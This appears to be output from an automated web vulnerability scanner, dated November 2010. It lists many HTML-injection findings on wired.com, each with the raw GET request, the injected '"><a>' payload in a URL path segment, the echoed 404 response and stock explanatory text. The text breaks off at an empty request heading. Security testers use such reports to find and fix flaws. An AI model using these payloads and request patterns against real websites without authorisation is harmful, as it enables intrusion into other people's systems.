GET /ajax/widgets/relatedf606f"><a>222e926617f/content/blogPost/threatlevel_7588 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29392 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:15 GMT Date: Mon, 22 Nov 2010 01:11:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_relatedf606f"><a>222e926617f"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3862"><a>16338f02f90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajaxe3862"><a>16338f02f90/widgets/related/content/blogPost/underwire_53528 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29391 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:06 GMT Date: Mon, 22 Nov 2010 01:10:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajaxe3862"><a>16338f02f90 ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb9a4"><a>f176c1e030e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgetseb9a4"><a>f176c1e030e/related/content/blogPost/underwire_53528 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29391 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:45 GMT Date: Mon, 22 Nov 2010 01:10:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgetseb9a4"><a>f176c1e030e c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a940d"><a>ad6ce4969ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/relateda940d"><a>ad6ce4969ca/content/blogPost/underwire_53528 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29391 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:01 GMT Date: Mon, 22 Nov 2010 01:11:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_relateda940d"><a>ad6ce4969ca"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37e36"><a>663daf42f79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blogs37e36"><a>663daf42f79 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.wired.com/
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29320 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 22:29:37 GMT Date: Sun, 21 Nov 2010 22:25:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_blogs37e36"><a>663daf42f79"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7458"><a>0bc4e457d49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blogsb7458"><a>0bc4e457d49/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=235 Expires: Sun, 21 Nov 2010 20:14:10 GMT Date: Sun, 21 Nov 2010 20:10:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_blogsb7458"><a>0bc4e457d49"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 808a6"><a>226b4160ebe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cars808a6"><a>226b4160ebe HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29298 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:09 GMT Date: Mon, 22 Nov 2010 01:11:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cars808a6"><a>226b4160ebe"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 847ce"><a>650bafdb219 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cars847ce"><a>650bafdb219/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29299 Vary: Accept-Encoding Cache-Control: max-age=223 Expires: Sun, 21 Nov 2010 20:15:22 GMT Date: Sun, 21 Nov 2010 20:11:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cars847ce"><a>650bafdb219"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 215d7"><a>d31fce4364 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cars215d7"><a>d31fce4364/coolwheels HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:09:51 GMT Date: Sun, 21 Nov 2010 23:05:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cars215d7"><a>d31fce4364 ss_coolwheels"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0a5e"><a>3d542f5f695 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cars/coolwheelsf0a5e"><a>3d542f5f695 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29323 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:18 GMT Date: Sun, 21 Nov 2010 23:06:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cars ss_coolwheelsf0a5e"><a>3d542f5f695"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93d8b"><a>cd4df970211 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cars93d8b"><a>cd4df970211/energy HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29315 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:09:53 GMT Date: Sun, 21 Nov 2010 23:05:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cars93d8b"><a>cd4df970211 ss_energy"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a3cd"><a>1fe87d440bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cars/energy1a3cd"><a>1fe87d440bf HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29315 Vary: Accept-Encoding Cache-Control: max-age=554 Expires: Sun, 21 Nov 2010 23:15:34 GMT Date: Sun, 21 Nov 2010 23:06:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cars ss_energy1a3cd"><a>1fe87d440bf"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5a14"><a>265d8487a92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /carse5a14"><a>265d8487a92/futuretransport HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29333 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:09:58 GMT Date: Sun, 21 Nov 2010 23:05:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_carse5a14"><a>265d8487a92 ss_futuretransport"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36c73"><a>e09bc35649e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cars/futuretransport36c73"><a>e09bc35649e HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29333 Vary: Accept-Encoding Cache-Control: max-age=583 Expires: Sun, 21 Nov 2010 23:16:08 GMT Date: Sun, 21 Nov 2010 23:06:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cars ss_futuretransport36c73"><a>e09bc35649e"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8402"><a>edd50cf471 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturee8402"><a>edd50cf471 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29238 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:14 GMT Date: Mon, 22 Nov 2010 01:11:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturee8402"><a>edd50cf471"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e53de"><a>40592780ce4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturee53de"><a>40592780ce4/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29241 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 20:15:44 GMT Date: Sun, 21 Nov 2010 20:11:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturee53de"><a>40592780ce4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dbf8"><a>ab6cb8357ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture8dbf8"><a>ab6cb8357ba/art HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29251 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:09:58 GMT Date: Sun, 21 Nov 2010 23:05:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture8dbf8"><a>ab6cb8357ba ss_art"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d542"><a>e8d21a02e71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art4d542"><a>e8d21a02e71 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29251 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:24 GMT Date: Sun, 21 Nov 2010 23:06:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art4d542"><a>e8d21a02e71"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86153"><a>a16e375242b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture86153"><a>a16e375242b/art/magazine/15-11/pl_arts HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29285 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:10:22 GMT Date: Sun, 21 Nov 2010 23:06:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture86153"><a>a16e375242b ss_art c_magazine"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44d77"><a>f26f00f82f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
